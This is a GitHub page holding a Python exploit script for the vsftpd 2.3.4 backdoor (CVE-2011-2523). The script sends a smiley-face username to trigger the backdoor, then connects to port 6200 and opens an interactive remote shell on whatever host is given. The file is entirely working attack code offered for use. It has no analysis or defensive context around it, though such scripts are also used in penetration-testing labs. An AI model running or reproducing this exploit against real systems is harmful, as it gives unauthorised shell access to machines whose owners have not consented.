-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
50 lines (35 loc) · 1.24 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/python3
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
from telnetlib import Telnet
import argparse
import sys
import time
parser = argparse.ArgumentParser(description='vsftpd 2.3.4 exploit', usage=f'python3 {sys.argv[0]} -host ip_address', epilog=f'EXAMPLE - python3 %(prog)s -host 192.168.168.128')
parser.add_argument('-host',metavar="ip address", dest='host',help="input the ip address of the vulnerable host", required=True)
args = parser.parse_args()
host = args.host
if len(sys.argv) < 3:
parser.print_help()
sys.exit()
portFTP = "21"
user = "USER hackerman:)"
password = "PASS pass"
print("If it take so long to connect to host then check host is running vsftpd or not!")
time.sleep(2)
tn = Telnet(host,portFTP)
print(f"[+]Opening Connection to {host} on port 21: Done")
time.sleep(1)
tn.read_until(b"(vsFTPd 2.3.4)")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.")
tn.write(password.encode('ascii') + b"\n")
tn.close()
time.sleep(5)
print(f"[+]Opening Connection to {host} on port 6200: Done")
tn2 = Telnet(host, 6200)
print("[+]Success, shell opened")
print("[*]Send `exit` to quit shell")
tn2.interact()